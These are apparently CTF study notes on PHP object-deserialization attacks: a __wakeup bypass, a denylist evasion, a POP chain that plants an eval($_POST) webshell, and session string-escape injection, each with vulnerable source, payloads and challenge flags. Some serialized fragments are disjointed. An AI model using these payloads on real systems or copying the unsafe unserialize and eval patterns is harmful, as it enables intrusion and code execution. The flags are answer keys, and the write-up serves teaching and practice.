serialize()函数
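// Serialize a PHP value to its string form and persist it to a file.
$s = serialize($变量);
// serialize() turns the value into PHP's text serialization format (a string)
file_put_contents('./目标文本文件', $s);
// save $s to the named file; file_put_contents() returns false on failure,
// which this snippet does not check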
了解了缩写的类型字母,便可以得到PHP序列化格式
unserialize()函数
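// Read a previously serialized string back from the file and restore the value.
$s = file_get_contents('./目标文本文件');
// contents of the text file (the string serialized earlier); returns false on
// failure, which this snippet does not check
// SECURITY: unserialize() reconstructs any class present in the data and runs
// its __wakeup/__destruct hooks. Only use it on files nobody else can write,
// or pass ['allowed_classes' => false] / store JSON instead.
$变量 = unserialize($s);
// deserialize the file contents into the given variable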
魔术方法
__wakeup()魔法函数绕过
PHP反序列化漏洞CVE-2016-7124
重点：当反序列化字符串中表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行
// Guard fixture for the CVE-2016-7124 note above: __wakeup() aborts the request,
// so the class body is only reached when unserialize() skips __wakeup. The
// payload arrives in the `code` query parameter (the page's trailing "?code=").
class xctf { // define a class named xctf
    public $flag = '111'; // public property $flag with the value 111
    public function __wakeup() { // public method __wakeup(): print "bad requests" and stop the script
        exit('bad requests');
    }
}
the answer is : cyberpeace{24a1e95dab10ea486aed8d9ffccbcbd1}
highlight_file() 函数对文件进行语法高亮显示。
highlight_file(filename,return)
| 参数 | 描述 |
|---|---|
| filename | 必需。要进行高亮处理的 PHP 文件的路径。 |
| return | 可选。如果设置为 true，则本函数返回高亮处理后的代码。 |
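<?php
// Deserialization challenge: the only input is $_GET['var'] (base64), which is
// handed to unserialize() unchanged, so Demo's hooks are what request data reaches.
class Demo
{
    private $file = 'index.php';

    public function __construct($file)
    {
        $this->file = $file;
    }

    // Runs when the object is released; highlight_file() prints the source of
    // whatever path $file holds, so $file must never be attacker-controlled.
    public function __destruct()
    {
        echo @highlight_file($this->file, true);
    }

    // Deserialization guard: forces $file back to index.php. It only protects
    // the file if unserialize() actually invokes it (see CVE-2016-7124 above:
    // a declared property count larger than the real one skips __wakeup on
    // affected versions).
    public function __wakeup()
    {
        if ($this->file != 'index.php') {
            // the secret is in the fl4g.php (hint)
            $this->file = 'index.php';
        }
    }
}

if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']); // base64-decode the payload
    // Denylist on "O:<digits>:" / "C:<digits>:". A signed length such as
    // "O:+4:" is still accepted by unserialize() but is not matched here, so
    // the check is not a real defence. SECURITY: unserialize() on request
    // data allows arbitrary object instantiation; restrict it with the
    // allowed_classes option or exchange JSON instead.
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {
        @unserialize($var);
    }
} else {
    highlight_file("index.php");
}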
“O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}”
$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}
<?php
// Challenge entry point: whatever arrives in ?select= is fed to unserialize()
// unchanged; the classes it can instantiate are the ones loaded from class.php.
include 'class.php';
$select = $_GET['select']; // request parameter (read without isset(), a missing key only warns)
// SECURITY: unserialize() of request data lets the caller instantiate any loaded
// class and trigger its __wakeup/__destruct hooks; restrict with the
// allowed_classes option or use JSON.
$res=unserialize(@$select);
?>
<?php
include 'flag.php';
error_reporting(0);
// Challenge class: the flag is printed from __destruct() when the deserialized
// object carries username 'admin' and a password loosely equal to 100.
class Name{
    private $username = 'nonono';
    private $password = 'yesyes'; // defaults
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password; // assign
    }
    // Deserialization guard: forces username back to 'guest'. It only protects
    // the flag if unserialize() actually invokes it (cf. CVE-2016-7124 above).
    function __wakeup(){
        $this->username = 'guest'; // (author's note) the check to get past
    }
    function __destruct(){
        // loose != : any value that == 100 (int or numeric string) passes
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            // both values are echoed into HTML without htmlspecialchars()
            echo $this->username;
            echo "</br>";
            echo "You password is: ";
            echo $this->password;
            echo "</br>";
            die(); //password=100
        }
        // strict === : only the exact string 'admin' reaches the flag
        if ($this->username === 'admin') { //username='admin'
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
flag{d2e7fc8f-788c-45b9-a16b-a84c7a09ee20}
<?php
// POP-chain challenge: unserialize($_POST['pop']) at the bottom has no class
// allow-list, so every hook below (__invoke, __call, __toString, __destruct) is
// reachable from request data. The single dangerous sink is eval() in
// mix::get_flag(); the numbered comments are the author's walk of the chain.
class crow {
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2); // instantiates whichever class name $v1 holds
    }
    public function __invoke() {
        $this->v1->world(); //3. triggers __call (no visible class defines world())
    }
}
class fin {
    public $f1;
    public function __destruct() {
        echo $this->f1 . '114514'; //6. string conversion calls __toString()
    }
    public function run() {
        ($this->f1)();
    }
    public function __call($a, $b) {
        echo $this->f1->get_flag(); //2. calls get_flag()
    }
}
class what {
    public $a;
    public function __toString() {
        $this->a->run(); //5. calls run()
        return 'hello';
    }
}
class mix {
    public $m1;
    public function run() {
        ($this->m1)(); //4. triggers __invoke
    }
    public function get_flag() {
        // SECURITY: eval() of a deserialized string; the '#' prefix comments out
        // only the rest of one line and is not a sanitiser. Remove eval() entirely.
        eval('#'.$this->m1); //1. target
    }
}
highlight_file(__FILE__);
if (isset($_POST['pop'])) {
    unserialize($_POST['pop']); // SECURITY: pass ['allowed_classes' => [...]] or use JSON
}
<?php
// Payload generator for the challenge above: the same four classes, reduced to
// constructors, are nested so that fin::__destruct -> what::__toString ->
// mix::run -> crow::__invoke -> fin::__call -> mix::get_flag (the author's
// numbered steps in reverse). Defensive reading: no class here is harmful by
// itself; the chain exists only because the target's unserialize() accepts an
// arbitrary object graph. An allow-list (allowed_classes) or a non-object
// format such as JSON removes it.
class crow {
    public $v1;
    public $v2;
    public function __construct($v1) {
        $this->v1 = $v1;
    }
}
class fin {
    public $f1;
    public function __construct($f1) {
        $this->f1 = $f1;
    }
}
class what {
    public $a;
    public function __construct($a) {
        $this->a = $a;
    }
}
class mix {
    public $m1;
    public function __construct($m1) {
        $this->m1 = $m1;
    }
}
$f = new mix("?><?=eval(\$_POST[1]);");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?>
//cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1
a:2:{s:7:"flagphp";
s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
a:2:{s:7:" ";s:48: ";s:1:"a";
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
<?php
// Session-injection challenge. Three things combine here: extract($_POST) lets
// a request overwrite any variable including $_SESSION; filter() is applied to
// the already-serialized string, so deleting substrings desynchronises the
// declared s:N lengths from the data; and the result is unserialize()d and used
// as a file path. Filtering must happen before serialization, and session data
// should never round-trip through unserialize() of a modified string.
$function = @$_GET['f'];
// build the filter function
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
if($_SESSION){
    unset($_SESSION);
}
// initial values
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST); // allows variable overwrite (SECURITY: never extract() request data)
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png'); // img assignment
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
// filter runs AFTER serialize(): removed characters shorten the string but not
// the s:N length fields already written into it
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!(found d0g3_f1ag.php)
}else if($function == 'show_image'){ // determine the value of function
    $userinfo = unserialize($serialize_info);
    // path comes straight from the deserialized session: arbitrary file read
    echo file_get_contents(base64_decode($userinfo['img'])); // target
}
_SESSION[function]=show_image&_SESSION[1]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
a:3:{s:8:"function";s:10:"show_image"
;i:1;s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}
a:3:{s:8:"function";s:22:"show_image";i:1;s:60:"";
s:3:"qwe";s:2:"qw";
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
";s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}